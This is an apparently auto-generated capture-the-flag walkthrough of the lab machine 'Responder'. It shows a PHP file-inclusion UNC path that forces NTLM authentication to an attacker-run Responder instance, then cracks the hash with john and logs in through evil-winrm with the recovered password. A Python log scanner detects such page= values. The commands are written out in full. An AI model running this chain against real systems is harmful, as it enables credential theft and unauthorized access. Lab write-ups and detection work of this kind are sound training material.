
Responder


Difficulty: Easy. Published 2026-04-12. Sanitized local writeup.


Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.


Source coverage

Status: partial (moderate source coverage, 57%). This article is generated from 2 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict: moderate confidence. The page is useful for review, but it should be treated as partial because the available source material is thinner or less narrative-complete.

  • <TARGET>-Responder/walkthrough.md
  • HTB/<TARGET>-Responder/notes.md

Technical Walkthrough

Responder - Walkthrough

Summary

Windows Easy box exploiting PHP file inclusion to trigger NTLM authentication to an attacker-controlled Responder instance, capturing the Administrator NTLMv2 hash, cracking it, and connecting via WinRM.

Attack Chain: LFI/RFI (PHP page= param) -> Responder NTLM capture -> John hash crack -> WinRM shell

Phase 2: Exploitation

Step 1: Start Responder

```bash
sudo responder -I tun0
```

Responder listens on tun0 for incoming NTLM authentication attempts over SMB, HTTP and other protocols.

Step 2: Trigger NTLM Auth via File Inclusion

```bash
curl -s 'http://unika.htb/index.php?page=//<TARGET>/someshare'
```

The PHP include() function follows the UNC path, causing the Windows server to attempt NTLM authentication to our IP.

Step 3: Capture Hash

Responder captured the NTLMv2 hash:

```text
Administrator::<secret redacted>:a3b1d83c2a4d89f3:<hash redacted>:0101000000000000...
```

Step 4: Crack Hash

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Result: Administrator:badminton (cracked instantly)

Step 5: WinRM Access

```bash
evil-winrm -i <TARGET> -u Administrator -p badminton
```

Logged in as responder\administrator.

Step 6: Capture Flag

```powershell
type C:<local workspace>
```

Flag: <hash redacted>

Key Techniques

  1. NTLM Relay/Capture: Windows will automatically send NTLM credentials when accessing a UNC path (\\IP\share). If an application can be tricked into accessing a remote UNC path, Responder can capture the hash.
  2. PHP File Inclusion to NTLM: PHP's include() on Windows will follow UNC paths (//IP/share), triggering NTLM authentication.
  3. Credential Reuse: The captured Administrator hash cracked to a weak password, allowing direct WinRM access.

Lessons Learned

  • The page= parameter accepting arbitrary paths (including UNC paths) is a critical vulnerability
  • Always check for WinRM (5985) on Windows targets; it is the preferred remote access once credentials are obtained
  • Responder is extremely effective when combined with any file inclusion/SSRF that can reach an attacker-controlled IP
  • Weak passwords (like "badminton") in NTLMv2 hashes crack instantly against common wordlists
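The techniques and lessons above boil down to one detectable pattern: a page= value that is not one of the application's real pages but a UNC path, a remote URL or a traversal. The following is an added example (not code from the original writeup) that classifies page= values in Apache access logs; the log lines, the IP 10.10.14.9 and the allowlist of two language pages are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not from the original writeup); the
# UNC entries mirror the page=//<ip>/share pattern the walkthrough describes.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/2026:10:00:01 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 512
10.0.0.5 - - [12/Apr/2026:10:00:02 +0000] "GET /index.php?page=//10.10.14.9/someshare HTTP/1.1" 200 0
10.0.0.5 - - [12/Apr/2026:10:00:03 +0000] "GET /index.php?page=%5C%5C10.10.14.9%5Cshare HTTP/1.1" 200 0
10.0.0.5 - - [12/Apr/2026:10:00:04 +0000] "GET /index.php?page=../../windows/win.ini HTTP/1.1" 200 90
10.0.0.5 - - [12/Apr/2026:10:00:05 +0000] "GET /index.php?page=http://10.10.14.9/x.txt HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
ALLOWED_PAGES = {"french.html", "german.html"}  # assumed: the app's only real pages

def classify_page_value(value: str) -> str:
    """Label one page= value: allowed, unc, remote_url, traversal or unexpected."""
    v = unquote(value).replace("\\", "/")           # \\host\share -> //host/share
    if v in ALLOWED_PAGES:
        return "allowed"
    if v.startswith("//"):                          # UNC path: include() authenticates via NTLM
        return "unc"
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):  # remote include via a PHP stream wrapper
        return "remote_url"
    if ".." in v.split("/") or ":" in v[:2]:        # directory traversal or drive-letter path
        return "traversal"
    return "unexpected"

def scan_access_log(text: str) -> list[tuple[str, str]]:
    """Return (label, decoded page value) for every request not hitting an allowed page."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query)   # parse_qs percent-decodes values
        for raw in qs.get("page", []):
            label = classify_page_value(raw)
            if label != "allowed":
                findings.append((label, raw))
    return findings

if __name__ == "__main__":
    for label, value in scan_access_log(SAMPLE_LOG):
        print(f"{label:10s} {value}")
```

The same allowlist check, applied before include() in the PHP handler, is the fix for the vulnerability itself; the scanner only tells you whether it has already been exercised.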

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Target Details

  • IP: <TARGET>
  • OS: Windows (TTL 127)
  • Hostname: <secret redacted>
  • Domain: <secret redacted> / <secret redacted>
  • Difficulty: Easy (Starting Point)
  • Attacker IP: <TARGET> (Pwnbox tun0)

Open Ports

| Port | Service   | Version                              |
|------|-----------|--------------------------------------|
| 80   | HTTP      | Apache 2.4.52 (Win64) PHP/8.1.1      |
| 5985 | WinRM     | wsman                                |
| 7680 | pando-pub | Windows Update Delivery Optimization |

Enumeration Timeline

Web (Port 80)

  • Root redirects to http://unika.htb/ (added to /etc/hosts)
  • PHP web app with language selector: /index.php?page=french.html, /index.php?page=german.html
  • Vulnerability: Local/Remote File Inclusion via page= parameter
  • Confirmed: page=//<TARGET>/share triggers SMB connection back to attacker

NTLM Hash Capture

  • Started Responder on Pwnbox: sudo responder -I tun0
  • Triggered NTLM auth: curl http://unika.htb/index.php?page=//<TARGET>/someshare
  • Captured NTLMv2 hash for Administrator account
  • Hash saved at: /usr/share/responder/logs/SMB-NTLMv2-SSP-<TARGET>.txt

Hash Cracking

  • Tool: john the ripper with rockyou.txt
  • Result: Administrator:badminton
  • Crack time: <1 second

Foothold (WinRM)

  • Connected via evil-winrm: evil-winrm -i <TARGET> -u Administrator -p badminton
  • Landed as: responder\administrator

Flags

  • Flag: <hash redacted> (C:\Users\mike\Desktop\flag.txt)

Credentials

| Username      | Password  | Source                               |
|---------------|-----------|--------------------------------------|
| Administrator | badminton | NTLMv2 hash cracked via john/rockyou |